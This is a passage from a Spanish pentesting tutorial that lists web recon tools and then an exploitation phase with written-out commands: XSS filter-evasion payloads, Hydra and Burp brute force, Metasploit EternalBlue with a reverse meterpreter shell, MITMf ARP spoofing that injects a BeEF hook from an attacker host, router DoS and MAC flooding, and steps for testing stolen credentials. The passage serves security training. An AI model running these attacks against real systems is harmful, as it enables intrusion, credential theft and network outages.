propia en la empresa seguiremos con nuestro Pentest siguiendo con la fase de EXPLOTACION.

*WHATWEB
Esta herramienta sirve para identificar que tecnología está trabajando la aplicación web.

Comando: whatweb -v -a 3 http://unoraya.com

Comando: whatweb www.ejemplo.com


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Esto escaneara:

Gestor cms, frameworks para blogs, librerías JavaScript, dispositivos con acceso web y obtendremos:

Versión del servidor, tecnologías empleadas, direcciones de correo, páginas de error. (en summary podemos ver el resultado)

*SSLSCAN
Identifica los servicios SSL si es vulnerable o no, Detecta las versiones y variantes SSL.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Básicamente es un protocolo, que proporciona servicios de seguridad cifrando los datos intercambiados entre el servidor y el
cliente. Permite que la información viaje encriptada evitándose que puede ser leída.

Comando: sslscan www.ejemplo.com

*WAFW00F
Waf = un WAF es una aplicación web detrás de un firewall, este WAF protege de ataques como SQL inyección, denegación de
Servicios ETC.
WAF es una abreviación en inglés que significa Firewall para Aplicaciones Web. Y para que sea fácil de entender, imagina que tu
sitio web es tu casa y la gente que está afuera en las calles es el tráfico que quiere ingresar a tu sitio web. Está claro que quieres
abrirle la puerta a amigos y familiares, pero también quieres proteger tu casa de los malhechores. Eso es exactamente lo que
hace el firewall. El WAF es un cerrojo inteligente para tu casa. Un WAF mantiene el tráfico malicioso fuera de tu sitio web. En
otras palabras, un WAF es una capa de protección que se ubica entre tu sitio web y el tráfico que recibe.
Wafw00f: Nos permite identificar qué tipo de Waf tiene la empresa.

Comando: wafw00f www.ejemplo.com


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

También podremos detectar un WAF con un comando de NMAP el comando es el siguiente:

Comando: nmap --script http-waf-fingerprint www.perros.com

*WPSCAN
Sirve para escanear vulnerabilidades a páginas creadas en Wordpress.

Comando: sudo wpscan -u http://www.rollingstones.com/


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*JOOMSCAN
La herramienta analizara los módulos y mostrara cuales son o no son vulnerables.

Comando: joomscan -u www.ejemplo.com


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Comando: sudo joomscan -u www.ejemplo.com -oh www.ejemplo.com

*NIKTO
Nikto nos permite saber o identificar la tecnología que tiene una aplicación web permite hacer enumeración, descubrimiento
ver si tiene errores, etc. (Es un analista de plataformas Web).

Comando: nikto -h www.ejemplo.com

Nikto nos traerá esta mucha información más solo que hay que hacer el escaneo con tiempo ya que es demorado (tarda en
hacer el escaneo a la página).

*BADMOD BOT
Esta herramienta nos mostrara: Robots File, reverse DNS (muestra si es Wordpress/Joomla u otro), nos muestra si es vulnerable,
subdominios, CMS entre otros.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Escáner XAttaquer v2.5


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Con nano editamos Sites.txt y guardamos allí las URL que queremos auditar Guardamos y ejecutamos.

Ejecutamos XAtacker.pl

Nos pregunta que si tenemos una lista de sitios web para escanear le decimos que si marcando con 1 y escribimos el nombre de
la lista de webs a escanear.

En caso de encontrar vulnerabilidades nos mostrara el link e iremos a verificar la existencia de las mismas.

Si con el archivo de texto la herramienta no trae ningún resultado probar con la opción no (2) después la opción 2 nuevamente
pegar la URL y ya la herramienta comienza el escaneo (Este escaneo es muy Completo).

Cred0v3r
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Investigar si los Correos y Contraseñas obtenidas son funcionales o verdaderas En Redes Sociales, estos usuarios y contraseñas
pudimos haberlos obtenido de los escaneos anteriores.

con esto podremos verificar rápidamente si las cuentas son reales y en que paginas tienen cuentas creadas.

Si la contraseña ingresada y el correo son válidos veras en verde login successful de lo contrario se verá como malo así el correo
exista en alguna red social no se verá como verdadero si la contraseña no es correcta.

*GOLISMERO
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Golismero es un framework y nos ayuda a integrar muchas herramientas/trae muchas herramientas para el proceso de
Pentesting, de auditorías web.

Esta herramienta trabaja con nmap, sslscan, Shodan, theharvester, openvas, y mucho más esta herramienta intenta hacer
transferencia de zona y un largo etc.

Comando: golismero scan www.ejemplo.com

Esto y mucho más nos trae la herramienta.

*DIRBUSTER
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Dirbuster nos detecta el árbol de carpetas o directorios que tiene la plataforma web que estamos auditando, para esto es
necesario pasarle una lista o diccionario con posibles nombres de diccionarios para que él pueda ir creando el árbol de
directorios.

El diccionario que podemos usar para este tipo de ataque no es necesario crearlo el diccionario ya está creado, Kali Linux ya lo
trae integrado también lo trae integrado el sistema operativo parrot OS el diccionario se encuentra en la ruta:
/usr/share/wordlists/dirbuster/diccionarioquedeseemoselegir

Comando: dirbuster
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*BURPSUITE
Reconocimiento Activo con burp suite, podremos encontrar cuentas de correo, directorios, direcciones IP de ámbito privado,
etc.

Para usar burp suite debemos configurar el navegador como proxy y burp suite para que pueda capturar todo de la página.

(Otro Vector de Ataque que podría ser usado). Encontrar las páginas de logueo es un vector de ataque ya que se
podría implementar un Ataque de Diccionario.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*OWASP ZAP
Escaneo de vulnerabilidades con Owasp zap

Con Owasp zap podremos encontrar vulnerabilidades automáticamente en un entorno grafico muy agradable, después
podremos ir y verificar que sean reales manualmente y no que sean falsos positivos.

*VEGA
Vega es otro analizador de vulnerabilidades automático del cual nos podremos ayudar.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Podemos buscar dentro de los resultados e ir a comprobar manualmente la vulnerabilidad.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

4) EXPLOTACIÓN

*SQL INYECCION
Sql inyección básicamente es insertar secuencias/sentencias sql por medio de los formularios, envió de datos o solicitudes de las
aplicaciones que están conectadas a una base de datos para obtener información de la misma.

Este método de ataque puede ser enviado o inyectado por método GET o método POST. Escanea las bases de datos relacionales
únicamente, como lo que es Mysql, postgres, Oracle, dbOS, SQLserver, etc.

No aplica a Mongo DB entre otras.

Comando: sqlmap -u http://ejemplo.com/cat=1


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Inyección de código manual con XSS


Comandos XSS

Nivel (1)

Alert Básico etiqueta básica de XSS:

<script>alert("HolaSoyVulnerable")</script>

Nivel (2)

En caso que no funcione la etiqueta normal podremos cambiarla usando la misma solo modificando unas letras

minúsculas por otras mayúsculas: (Esto se hace para evadir filtros de seguridad).

<ScriPt>alert("HolaSoyVulnerable")</sCripT>
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Nivel (3)

<scri<Script>pt>alert("hacked")</scri</SCript>pt>

Nivel (4)

Si ninguna de las etiquetas anteriores funciona es por que la etiqueta alert ya ha sido bloqueada completamente

por lo cual usaremos una etiqueta de imagen para generar un error y asi darnos cuenta de que es vulnerable:

<img src="X" onerror="alert('Hacked')">

Nivel (5)

Ya en este nivel deberíamos empezar a usar los caracteres ASCII ya que la etiqueta alert nos lo han bloqueado

por su seguridad para saltarnos ese filtro usaremos la etiqueta prompt de la siguiente manera:

<Script>prompt("XSS")</scripT>

Nivel (6)

";alert('XSS');"

";prompt('XSS');"

Nivel (7)

Este nivel es parecido al anterior con la diferencia de las comillas simples y el numero, si el nivel anterior

no funciono (no muestra resultados) y la pagina es vulnerable y no muestra el mensaje lo modificamos por el

siguiente comando:

';alert(10);'

Nivel (8)

En este caso sería completar el código que hay dentro de la página primero cambiar del método POST al método GET

verificar que si cambia la URL y ver el código fuente action="/xss/example8.php y terminar de completarlo para

hacer la inyección con el siguiente código:

/"><script>alert(10);</scripT>

por lo cual terminado (completo) quedaría así: http://192.168.1.66/xss/example8.php/"><script>alert(10);</scripT>


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Nivel (9)

Cuando en la URL hay un # es posible o podría ser posible inyectar XSS básico por ejemplo con este comando:

<script>alert(12)</script>

*Ataque de diccionario con Burp Suite


En este ejemplo atacaremos un login de una página con la herramienta Burp Suite que tiene una interfaz gráfica muy agradable
para trabajar.

Página a Atacar (login)

Acomidamos o verificamos que Burp Suite este configurado como Proxy.

Igual en el navegador ponemos en manual proxy la IP 127.0.0.1 o localhost y el puerto 8080 que es el que vamos a usar.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Entramos a la página que vamos auditar.

Damos en Forward para que la pagina cargue


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Introducimos cualquier usuario y contraseña solo para que en Burp Suite podamos ver y modificar para enviar el Ataque.

Enviamos la información a intruder.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Verificamos y luego vamos a la pestaña positions.

Seleccionamos la contraseña cifrada para ir a decode base 64 y descifrarla (esta fue la información que ingresamos user y pass)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Seleccionamos (subrayamos) de nuevo y le damos a la opción Add para seleccionar y nos dirigimos a la pestaña payload.

Una vez en payload configuramos brute forcé ya que haremos un ataque de fuerza bruta en character set escribimos los
caracteres y letras que se van a usar para el ataque.

Aquí añadimos un add prefix que es el usuario en este caso y seguido con dos puntos.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Añadimos otro add en este caso Encode Base64-encode que es el tipo de cifrado.

Aquí quitamos el signo = ya que el cifrado de base 64 termina con dos iguales de esta forma == y para que no se agregue uno
mas.

Y listo enviamos el ataque.

Aquí le damos en ok aquí nos recuerda que es una versión de paga.

En esta ventana podemos ver el avance del ataque.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501

De esta manera podremos hacer un ataque de fuerza bruta a páginas de login.


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*HYDRA
Nos permite hacer ataques de fuerza bruta a diversos protocolos como en el siguiente ejemplo.

Comando: hydra -L users.txt -P passwords.txt ftp://192.168.1.1

Con HYDRA podremos hacer ataques a los login de las paginas Auditadas en esta ejemplo se está auditando el Rúter con el
comando: hydra -L logins.txt -P pws.txt telnet://192.168.1.1

El cual estamos posicionados en el escritorio (Desktop) donde en esta ubicación tenemos el archivo de texto logins.txt que es el
que contiene la lista de los posibles User y en el archivo de texto pws.txt están todas las posibles contraseñas por último
colocamos el servicio que se va Auditar en este caso TELNET separando de la IP con :// en este punto solo deberíamos dar enter
para enviar el Ataque.

Al final del Ataque con HYDRA nos mostrara los resultados donde dice 1 de 1 objetivos completados y si dimos con alguna
contraseña nos mostrara el número de contraseñas y usuarios acertados.

Podríamos usar la versión GUI de Hydra si no deseamos usar los comandos esta versión se llama XHYDRA.

El comando para usar xhydra es:

Comando: xhydra
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

*SOCIAL BOX
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ESCANEO DE RED CON NET.
Los Sistemas de Microsoft Windows disponen de un sistema de comunicaciones de red basado en el protocolo NetBIOS, se creó
con el fin de compartir recursos entre ordenadores en una Red LAN el cual vela por el correcto envió de información a través de
la comunicación.

(usaremos los siguientes comandos para el correcto análisis de la red y obtener la mayor información posible a la hora de un
Pentesting e intentar vulnerar los sistemas mediante una sesión nula para la documentación del INFORME).

Comandos.

Net view:

Muestra información de los equipos enumerados que se encuentran visibles en la red local.

net use \\PCESCRITORIO-PC ""/user: "":

Escogemos el pc al que deseamos ingresar en este caso PCESCRITORIO-PC, este comando es para establecer la sesión nula y
Tipeamos de nuevo net use para verificar que hay una conexión establecida como en la siguiente imagen:

¡Excelente!! Una vez dentro podremos ver sus recursos compartidos (En este caso no se logró entrar).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Tipeamos el comando.

Comando opción 1: net view \\192.168.1.74

Comando opción 2: net view \\PCESCRITORIO-PC

Podrá usar nombre NetBIOS, IP privadas o IP públicas (siempre que el servidor tenga abierto en el Ruter el puerto 139
[NetBIOS]).

CABE RESALTAR QUE UNA VES AQUÍ LOS SIGUIENTES COMANDOS FUNCIONARAN EN UN CONTROLADOR DE DOMINIO.

Comando: net view /domain

Para listar los dominios y grupos de trabajo que son accesibles.

Comando: net view /domain:CORREO

Si desea obtener una lista de los diferentes ordenadores que están en funcionamiento y pertenecen a un determinado dominio
o grupo de trabajo en este ejemplo el dominio (CORREO).

Y demás comandos:

Net view /domain:CORREO \\SERVCORREO1

Net accounts

Net group

Net localgroup

Net start

*Verificación de vulnerabilidades a nivel de Sistemas Operativos


Iniciamos los servicios necesarios para guardar el escaneo de namp en base de datos metasploit.

Iniciamos el servicio de postgresql (Fuera de Metasploit).

Comando: service postgresql start

Verificamos el estado: service postgresql status

Iniciamos bases de datos metasploit.

Comando: msfdb init

Iniciamos Metasploit.

Comando: msfconsole

Comprobamos que la base de datos de Metasploit esté funcionando (Dentro de la consola de Metasploit).

Comando: db_status
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Ejecutamos el escaneo con el comando db_nmap.

(Una vez iniciados los servicios procedemos a verificar Vulnerabilidades a nivel de Sistemas Operativos)

Cargamos el módulo de auxiliar para verificar los servicios SMB con el siguiente comando.

Comando: use auxiliary/scanner/smb/smb_version

Ahora escaneamos los equipos de la red solamente cuyo puerto 445 este Activo.

Comando: services -S open -p 445 -R

Tipeamos el comando exploit para ver que maquinas son vulnerables.

Comando: exploit

Los signos [+] de color verde que aparecen al lado izquierdo son las maquinas vulnerables.

*Validación para Equipos con Windows XP-7

Hacemos un escaneo completo a la Red para ver que equipos vulnerables hay para proceder a vulnerarlos (Dentro de
Metasploit).

Comandos de escaneo: use auxiliary/scanner/smb/smb_ms17_010

Segundo comando: set Rhosts 192.168.1.0/24

Tercer comando: run

IMG de Escaneo.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

Ahora que sabemos que Equipos son vulnerables pasemos a Explotar una maquina Windows 7 las que aparecen con el nombre
Windows 5.1 son máquinas con sistemas operativos XP.

Los comandos a tipear son los siguientes (Dentro de Metasploit):

Comando: use exploit/windows/smb/ms17_010_eternalblue

Comando: set payload windows/x64/meterpreter/reverse_tcp

Comando: show options

Comando: set Rhost 192.168.1.74 (IP Victima)

Comando: set Lhost 192.168.1.64 (IP Local-Atacante)

Comando: show options (Para verificar que haya quedado bien configurado)

Comando: exploit (Para vulnerar la maquina victima)

Bien ya se ha vulnerado ahora solo restaría tomar evidencia de la intrusión y ponerla en el reporte.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ATACAR EQUIPOS EN RED CON BEEF
Aremos esta auditoria con Kali Linux usando (MITMF + BEEF), primero elegimos un objetivo (IP) al cual atacar con Network
Scanner o cualquier otro escáner de Red Local.

Ahora instalaremos MITMF con el comando (apt-get install mitmf) si no te permite instalar probamos actualizando primero con
(apt-get update) y después probamos de nuevo (apt-get install mitmf).

También Instalaremos un paquete necesario que trabaja con MITMF para esta auditoria lo aremos con el siguiente comando
(pip install Twisted==15.5.0)

Ejecutamos BEEF esperamos a que se ejecute y se abra el navegador e ingresamos con el usuario beef y password beef.

Vamos a una consola y tipeamos el siguiente comando para Atacar (mitmf --arp --spoof --targets 192.168.0.104 --gateway
192.168.0.1 -i wlan0 --inject --js-url http://192.168.0.112:3000/hook.js) targets 192.168.0.104 es la ip victima Gateway es la
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
dirección ip del Ruter wlan0 es la interfaz de Red y http://IPATACANTE/hook.js es la url que genero BEEF con la cual vamos a
infectar la Red.

Bueno una vez cargue MITMF debemos esperar a que la víctima navegue en internet desde cualquier navegador para que el
ataque termine de concluir y comprometer el PC o Dispositivo que decidas Atacar. En la siguiente imagen se muestra los
dispositivos infectados en la Red.

*Verificación de usuarios por Defecto


Podemos ayudarnos de Metasploit con la función “servicios” iniciamos servicios de postgresql etc ya una vez dentro de
Metasploit podremos tipear el siguiente comando para ver los servicios http y https iniciados en los demás equipos de la Red.

Comando: services -s http, ssl/https -S open

Abrimos el navegador introducimos las IPs para intentar acceder con contraseñas por defecto y ver si son vulnerables.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ROUTERS VULNERABLES (VERIFICAR SI EL ROUTER ES VULNERABLE CON ROUTERSPLOIT)
Con este ataque verificaremos si el router está seguro o es vulnerable ante la herramienta ROUTERSPLOIT.

Instalación:

Comandos:

sudo apt-get install python3-pip

git clone https://www.github.com/threat9/routersploit

cd routersploit

python3 -m pip install -r requirements.txt

python3 rsf.py

USO:

use scanners/autopwn

set target [IP-DISPOSITIVO

run

ACTUALIZAR:

cd routersploit

git pull
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ATAQUE DOS AL RUTER O AP CON APFUCKER Y LINSET

Con este ataque podremos ver si el router es vulnerable a un ataque de DOS para así quitar el internet a todos los dispositivos
de la red.

Primero ejecutamos el LINSET y ponemos a escanear la red que queremos atacar y lo dejamos allí para sacar la información que
debemos digitar el APFUCKER.

Abrimos APFUCKER y tipeamos la letra t luego ingresamos la información que nos va pidiendo como es la siguiente imagen.

Por ultimo cuando nos pida confirmación le damos que si con la letra y damos enter y empieza el ataque.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ARMITAGE
Con armitage podemos tener comunicación con nuestros compañeros de Pentesting de esta manera trabajar en la misma
infraestructura.

Creado en java.

Armitage tiene un chat el cual nos podemos comunicar con el equipo de la Auditoria de Pentesting, en el chat también se
mostrará los procesos o escaneos que han hecho nuestros compañeros.

También podremos hacer Escaneos, Explotación desde Armitage, enumeración para ver puertos ver la red de una forma más
gráfica, identificando los sistemas operativos, después de todo esto permitirá hacer el proceso de PIVOTING entre muchas otras
cosas más.

ARMITAGE NO es solo metasploit de entorno grafico (GUI) tiene muchas más funciones mencionadas antes.

-PIVOTING: en el proceso de Pivoting podremos después de infectar una máquina de una infraestructura podremos infectar más
maquinas o dispositivos de la Red logrando así de esta forma burlar FIREWALLS, IDs y más.

Sniffer De RED

Con Wireshark podremos Sniffear la RED para ver todo el tráfico de paquetes de la misma también ayudándonos de la
herramienta NetworkMiner que mina la información aún más al detalle de la red y así poder ver más claramente todo lo que
ocurre en la RED.

Guardamos el escaneo de Wireshark en la opción File -> Save As. Lo guardaremos con la extensión .pcap para posteriormente
cargar el archivo a NetworkMiner.

Cargamos el archivo .pcap que guardamos del escaneo con Wireshark para ser analizado.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

ATAQUE DOS CON EVIL FOCA


Mira los videos en YouTube (Anonimo501) POR ANONIMO501
ATAQUE DE MAN IN THE MIDDLE
Si no hay seguridad en la empresa o usan INTERNET EXPLORER para navegar por internet hacer un simple ataque con EVIL FOCA
y WIRESHARK para interceptar contraseñas.

DE LO CONTRARIO USAR MITMF (MAN IN THE MIDDLE)


Este ataque afecta todos los navegadores incluyendo CHROME y en algunas páginas como Amazon u otras también paginas
creadas con Wordpress son vulnerables a este ataque, aunque este ataque no funciona con Facebook u otras redes sociales.

sudo mitmf --spoof --arp --hsts -i wlan0 --gateway 192.168.1.1 --target 192.168.1.56

Afecta navegadores de celular.

Y de computadores lo que quiere decir que afecta todos los dispositivos.

INFECTAR CELULARES MEDIANTE APK ENVIADOS POR CORREO O CUALQUIER MEDIO


Esta infección se puede hacer con DroidJack.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
VLAN HOOPING ATTACK
(salta la seguridad en la red segmentada, configurando el pc o host como si fuera otro switch para enviar a los switch reales
mensajes de tipo DTP para que crean que el host o pc es un switch y asi poder saltar la seguridad segmentada).

SPANNIG TREE ATTACK


Este ataque puede bajar el rendimiento o la productividad de la empresa (pone la Red más Lenta enviando mensajes de tipo
BPDU (los mensajes BPDU solo los envían los Shwitchs) y en ocasiones la tumba, esto hace como si hubiese dos root bridge en la
Red).

Instalación del programa yersinia en parrot os

Comando: sudo apt-get install yersinia

Se ejecuta en modo gráfico con el comando: sudo yersinia –G

Luego se configura.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501

MAC FLOODING ATTACK


Desbordamiento de MAC en la tabla del RUTER que contiene las Mac de los dispositivos conectados a la RED.

Para instalar la herramienta tipeamos: sudo apt-get install dsniff

Para ejecutar la herramienta y hacer el desbordamiento de MAC en el RUTER tipeamos: sudo macof –i eth0 –n 10000

O para atacar sin un número limitado podemos tipear: sudo macof -i eth0

SPEAR PHISHING ATTACK


Spear Phishing para robo de cuentas, primero modificamos el nombre del email de la cuenta falsa (ATACANTE) por la que
queramos hacer creer a la víctima quien le está enviando el correo, vamos a la parte de ajustes.

Das könnte Ihnen auch gefallen